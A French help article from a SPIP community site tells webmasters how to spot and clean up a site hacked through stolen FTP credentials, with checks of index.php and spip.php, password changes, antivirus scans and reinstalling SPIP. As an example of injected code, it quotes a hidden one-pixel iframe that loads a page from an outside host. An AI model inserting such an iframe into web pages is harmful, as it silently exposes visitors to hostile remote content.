Votre site est "hacké" !

  Quelques réflexes sur un exemple


Tout webmestre constate, un jour ou l’autre, une attaque de son site, avec -en cas de piratage réussi- des résultats et conséquences variables, par exemple que son hébergeur "blackliste" le site ou le ferme...

 
 
 
 
 
 
 
 
 
 
 
 


 Site attaqué ?

Cela n’arrive pas qu’aux autres ; et meme si vous suivez régulièrement les mises-à-jour de sécurité [1], les hackers peuvent frapper : exemple !

Il semble -d’après les analyses de Logs- que ce soit souvent la simple récupération du mot de passe FTP (par un virus, type Gumblar) qui facilite (évidemment) le parasitage [2].

Pour vérifier votre site, b_b signale un outil d’exploration en-ligne
http://www.unmaskparasites.com/, auquel il suffit d’indiquer une home page.

_Fil_ a trouvé un outil de controle des php..

Ci-dessous par exemple, une information publiée sur la liste
qui est arrivé sur un site SPIP. [3] :
- À l’identification dans la partie privée

Affichage du message suivant :
Vous êtes enregistré... par ici...

Puis :
problème de cookie
Pour vous identifier de façon sûre sur ce site, vous devez accepter les cookies. Veuillez régler votre navigateur pour qu’il les accepte (au moins pour ce site).

Ce problème semble survenir de temps à autre depuis plusieurs années - cf. les forums et autres recherches sur Google (entre autres). [4]

 Pour faire simple :

Premier réflexe = regarder (par FTP) le contenu de : index.php
 [5] et spip.php à la racine !
Cela pour s’apercevoir si/que le contenu a été modifié, selon l’hypothèse ci-dessus  !!

Genre : ajout de code comme :
<iframe src=http://www.kentobike.it/tmp/stata6.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>
 [6]

En clair, le site a subi une "attaque" par FTP, suite soit à une malveillance ou une autre bizarrerie qu’on ne comprend pas forcément trop.
Et cela pour rajouter des trucs super cra cra beurk...

 Actions

  • commencer par une copie FTP des sources et des logs vers un poste en local (pour analyse ultérieure), et une sauvegarde ./IMG/ et BDD Sauvegarder sa base de données SPIP [7].
  • Vérifier tous les fichiers index.html et index.php du site
  • Changement de tous les codes FTP d’accès au serveur d’hébergement et mise en place de mots de passe beaucoup plus complexes (exemple : pierre4897 ? ben c’est pas une super idée...rajoutez des caractères spéciaux, par exemple)
  • passez toutes les machines ayant accès au FTP [8] à un anti-virus
  • Réinstallation d’une version de SPIP générique provenant de spip.net en remplacement de l’ancienne : vous pouvez vous inspirer des procédures de Mettre SPIP à jour : comment ?.
  • Vérification des fichiers en .html ou .php de protection du dossier IMG

Il est toutefois possible que cette perturbation vienne d’une compromission du serveur, auquel cas SPIP n’y peut pas grand’chose ! [9]...


Merci de nous signaler les coquilles ou erreurs qui figureraient dans cette page.

[1La préoccupation sécurité chez SPIP n’est pas un vain mot : ecran de sécurité pour filtrer certaines attaques XSS, suivi régulier, et l’un des meilleurs scores au hit-parade du Certa ..

[2Il faut changer de mot de passe pour tous les comptes ftp qui ont accès à ce site et lancer une analyse antivirus sur toutes les machines qui avaient un accès ftp au site.

[3Merci a Bernard, alias Tonton BP, d’avoir volontiers participé à la publication de cet information d’avertissement.

[4Deux causes possibles :
- un problème complexe de plugins, donc tenter de régénérer son cookie de connexion en désactivant/renommant par FTP le dossier ./plugins le temps de se reconnecter, sinon réinstallation d’une version générique (et propre) de SPIP.
Et tout va bien et reprend son cours, jusqu’à ce que cela recommence une semaine après...
- ou bien un site hacké : retour au sujet de cette page !

[5Le contenu de ce fichier est des plus simple !!

[6L’URL n’est pas la cause : ainsi www.kentobike.it n’est pas en cause - j’ai eu aussi marcodenicolais.it (par exemple)...

[7Si possible sans lancer d’application php : préserver les fichiers logs...

[8Des fois qu’un keylogger ou autre pirate ait simplement récupéré votre mot de passe de connexion ..

[9C’est arrivé sur ce serveur en 2012, un logiciel du système d’exploitation présentait une faille Zero day !!


Liens visibles seulement pour les inscrits.

Article publié le 18 mai 2013, et actualisé en mars 2017 .

Répondre à cet article